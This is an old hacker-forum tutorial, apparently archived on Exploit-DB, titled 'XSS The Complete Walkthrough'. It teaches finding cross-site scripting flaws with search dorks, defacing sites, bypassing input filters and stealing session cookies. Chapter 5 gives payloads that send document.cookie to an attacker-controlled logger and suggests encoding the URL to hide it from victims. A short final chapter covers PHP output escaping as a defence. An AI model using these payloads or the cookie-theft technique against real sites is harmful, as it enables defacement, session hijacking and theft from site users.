XSS The Complete Walkthrough

EDB-ID:

13074

CVE:

N/A

Author:

t0pP8uZz

Type:

papers

Platform:

Multiple

Published:

2007-08-14

--==+================================================================================+==--
--==+                     XSS The Complete Walkthrough [About]                       +==--
--==+================================================================================+==--

Author: t0pP8uZz

Description: Complete tutorial on XSS methods.

Homepage: G0t-Root.net, H4cky0u.org, Milw0rm.com

Date: 24/07/07

Chapters:

What is XSS?
Finding XSS Vulnerbilitys
The Basics On XSS
Deface Methods
Cookie Stealing
Filteration Bypassing
Advanced XSS
Securing XSS


--==+================================================================================+==--
--==+          XSS The Complete Walkthrough [Chapter 1 - What is XSS?]               +==--
--==+================================================================================+==--

'XSS' also known as 'CSS' (Cross Site Scripting, Easily confused with 'Cascading Style Sheets')
is a very common vulnerbility found in Web Applications, 'XSS' allows the attacker to INSERT
malicous code, There are many types of XSS attacks, I will mention 3 of the most used.

The First Attack i wana talk about is 'URL XSS' this means that the XSS wont stay on the page
it will only get executed if you have the malicous code in the URL and submit the url
we will talk more on how to use this in our advantage.

The Second Attack is input fields, Where ever you can insert data, it is very common, to be XSS
vulnerable, for example say we found a site with a search engine, Now in the search box you enter
'hacker' now hit enter, when the page loads, if it says your data like 'Found 100 Results For hacker'
ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible
way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method,
Also wont stay on the server, this is for your eyes only.

The Third Attack, with this attack you will be able to INSERT data (code) and it will stay on the website.
now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also 
inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles
Forums, just most places where you insert data and it stays there. now HTML is totally diffrent then PHP
HTML downloads to your pc and then your 'Browser' parses/interprets the code, (thats why its source is viewable)
With PHP the code is interpretued on the server the script is hosted on, then the data is returned to the browser.
for PHP injection its rare, But it dont harm to try. Note: PHP code cant be injected into HTML page!


--==+================================================================================+==--
--==+      XSS The Complete Walkthrough [Chapter 2 - Finding XSS Vulnerbilitys]      +==--
--==+================================================================================+==--

Well to start finding these vulnerbilitys you can start checking out
Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.

Using 'Google Dorks' to make the finding easyier, Ok if you wana get cracking, goto google.com and type
inurl:"search.php?q=" now that is a common page and has alot of results, to find out some attacks move
onto the next chapter.

Also note that most sites have XSS vulnerbilitys, its just having a good eye, and some good knowledge
on how to bypass there filteration.


--==+================================================================================+==--
--==+          XSS The Complete Walkthrough [Chapter 3 - The Basics On XSS]          +==--
--==+================================================================================+==--

Well now to crack on, and start learning some Actual Methods, the most common used XSS injection is

<script>alert("XSS")</script>

now this will alert a popup message, saying "XSS" without quotes, its easily editable.

So backtracking on the last chapter im assuming you remember we talked about, search.php?q=
well you can simple try the following on a website with the same thing, 

http://site.com/search.php?q=<script>alert("XSS")</script>

there are good chances of it working, but dont be worried if it dont, just try diffrent sites.

some other easy XSS (i dont think people realise they can insert HTML not just javascript)

http://site.com/search.php?q=<br><br><b><u>XSS</u></b>

if you see the bold text on the page and newlines then you knows its vuln, then can move on using some 
methods explained later on in the tutorial.


--==+================================================================================+==--
--==+             XSS The Complete Walkthrough [Chapter 4 - Deface Methods]          +==--
--==+================================================================================+==--

Well now you understand how XSS works, we can explain some simple XSS deface methods, there
are many ways for defacing i will mention some of the best and most used,

the first one being IMG SCR, now for those of you who dont know html, IMG SCR is a tag, that
displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

ok now if u change the link to a valid picture link, and save it and run it you will see what i mean.

Right now say you have found a Shoutbox, Comment box, or anything that shows your data after you submitted it
you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

the other tags are not needed has the page will already have them. (rare cases they will not)

Ok it helps to make your picture big so it stands out and its clear the site got hacked.

Another method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

that will execute the flash video linked to it.

Or maybe using a pop or redirection?

<script>window.open( "http://www.google.com/" )</script>

There are many others ways that im not going to explain due to how busy i am, Its easy to lookup methods
using google and googleing for HTML tutorials, u can see how to embed Music ect.


--==+================================================================================+==--
--==+            XSS The Complete Walkthrough [Chapter 5 - Cookie Stealing]          +==--
--==+================================================================================+==--

I decided to add this has its the most USEFULL method of XSS, and i havent seen any papers, covering it.

first grab the cookie logger from here: http://G0t-Root.net/tools/cookie.php

ok now you have it save it has a .php file and upload to your server, remember to create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

ok now your gona want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth.

Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site hasnt got, this kind of attack, it only shows data once and dont
store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it 
and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

im not gona explain hexing it ect as it is pretty stright forward.


--==+================================================================================+==--
--==+      XSS The Complete Walkthrough [Chapter 6 - Filteration Bypassing]          +==--
--==+================================================================================+==--

Alot of sites may seem vulnerable but not executing the code, well to solve this take note of this chapter.

Some common methods to bypass filteration is

')alert('xss');

or

");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit,

Please note its bad practice to use alert("XSS") to test for XSS, has ive known sites block the keyword XSS 
before.

Some other ways to bypass filteration

<script type=text/javascript>alert("t0pP8uZz")</script>
<script>alert("t0pP8uZz")</script>;
<script>alert("t0pP8uZz");</script>
<script>alert("/t0pP8uZz"/)</script>
<script>var var = 1; alert(var)</script>

Read the next chapter for another way to bypass magic quotes filteration.


--==+================================================================================+==--
--==+             XSS The Complete Walkthrough [Chapter 6 - Advanced XSS]            +==--
--==+================================================================================+==--

Ok in this chapter were going to learn about some good techniqes, that i myself havent seen
being used before, but im sure you guys will like it.

ive came across many sites where 'Magic Quotes' is on and therfore rendering some commands useless.

fear not, ive come up with a way using char codes (Decimals), to convert char code to Ascii.

The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here http://www.asciitable.com/

this will help you write what you want, In my examples ill be writing "t0pP8uZz" this is the following code

116 48 112 80 56 117 90 122

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)

Ok now "String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)" Is a JAVA (ASCII) way of saying

t0pP8uZz

and to use this with alerts ect, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122))</script>

Ok now this will display or message in this case "t0pP8uZz", this method is very usefull for 
bypassing magic quotes and maybe some custom escaping of quotes.

Ok before i move on i wana talk about another method useing variables. lets declare one below

var myVar = 1

ok now myVar is a longer way of saying 1.

To use variables to our advantage in XSS, we could do the following

<script>var myVar = 1; alert(myVar)</script>

and this will display the variable contents again without using quotes.

There are many others methods, that im not going to talk about, XSS is a simple Attack.
and from here you should know what you need.


--==+================================================================================+==--
--==+             XSS The Complete Walkthrough [Chapter 7 - Securing XSS]            +==--
--==+================================================================================+==--

Ok this was written for WebDevelopers (yeah right..) so im gona talk about how to secure your code.

if you found XSS bugs in your scripts, its easy to secure, take a look at the below code

if(isset($_POST['form'])){echo "<html><body>" .$_POST['form']. "</body></html>";}

Ok say the variable $_POST['from'] was coming from a input box, then you have a XSS attack.
the following is a very easy way to secure that.

$charset='UTF-8'; $data  =  htmlentities ($_POST['form'], ENT_NOQUOTES, $charset);
if(isset($data)){echo "<html><body>" .$data. "</body></html>";}

now that will take all possible code and make it not executable. by turning it into stuff like
&lt; ect...

You will not notice a diffrence when using htmlentries();

there are also another common function, striptags(), find more info at php.net/striptags

ok another way to show you how to secure INTEGER variables. (variables that will always contain a INT)

$this = $_GET['id'];
echo "you are viewing " . $this . "blog";

now if we include ?id=<script>alert("XSS")</script>
into the url its gona execute our code, a very easy way to secure this is using (int) check the following code

$this = (int)$_GET['id'];
echo "you are viewing " . $this . "blog";

now if at anytime the varible contains anything but a Integer, it will return 0.

Thats enough said.


--==+================================================================================+==--
--==+                     XSS The Complete Walkthrough [The End]                     +==--
--==+================================================================================+==--

Well i hope you all enjoyied this paper, as much as i enjoyied writing it (not alot, lol).

If you got any questions feel free to come over at, g0t-root.net, h4cky0u.org
and use a help section regarding what you need help with.


Greetz: G0t-Root.net, H4cky0u.Org, Milw0rm.com

--==+================================================================================+==--
--==+                               XSS The Complete Walkthrough                     +==--
--==+================================================================================+==--

# milw0rm.com [2007-08-14]